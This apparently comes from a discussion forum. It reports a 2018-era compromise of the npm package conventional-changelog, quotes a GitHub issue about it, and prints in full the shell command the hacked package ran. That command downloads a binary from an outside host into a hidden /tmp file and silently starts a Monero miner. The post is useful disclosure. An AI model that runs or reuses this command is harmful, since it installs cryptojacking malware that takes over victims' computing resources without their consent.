NPM: conventional-changelog package hacked

Some details (<a href="https:&#x2F;&#x2F;github.com&#x2F;conventional-changelog&#x2F;conventional-changelog&#x2F;issues&#x2F;279#issuecomment-365344112" rel="nofollow">https:&#x2F;&#x2F;github.com&#x2F;conventional-changelog&#x2F;conventional-chang...</a>):<p>&gt; This happened because of a security issue: conventional-changelog package was hacked, and it contained a Monero miner.<p>&gt; I reported it to the devs and they unpublished it (and also conventional-changelog-preset-loader).<p>&gt; They should re-add a safe version tagged with 1.1.3 to fix this issue.<p>The hacked package executes:<p>rm -rf &#x2F;tmp&#x2F;.debug &amp;&amp; curl <a href="https:&#x2F;&#x2F;mnrlnt.blob.core.windows.net&#x2F;mnr&#x2F;Silence" rel="nofollow">https:&#x2F;&#x2F;mnrlnt.blob.core.windows.net&#x2F;mnr&#x2F;Silence</a> -o &#x2F;tmp&#x2F;.debug 2&gt; &#x2F;dev&#x2F;null &amp;&amp; chmod +x &#x2F;tmp&#x2F;.debug &amp;&amp; &#x2F;tmp&#x2F;.debug -o stratum+tcp:&#x2F;&#x2F;pool.minexmr.com:4444 -u 4A9V5knGUM8PUdPSJbTox8b9mgTsfXByK49XKtEyqVayDxD6CFJe5dsexaM99x7MXFNTxZkYAr4YtcAXQMkNrFjnRPJGJFr.JL6_$(hostname -f | md5sum | cut -c1-8) -p x -t $(lscpu | grep &#x27;CPU(s)&#x27;| grep -v &#x27;,&#x27; | awk &#x27;{print $2}&#x27; | head -n 1) 2&gt; &#x2F;dev&#x2F;null &amp;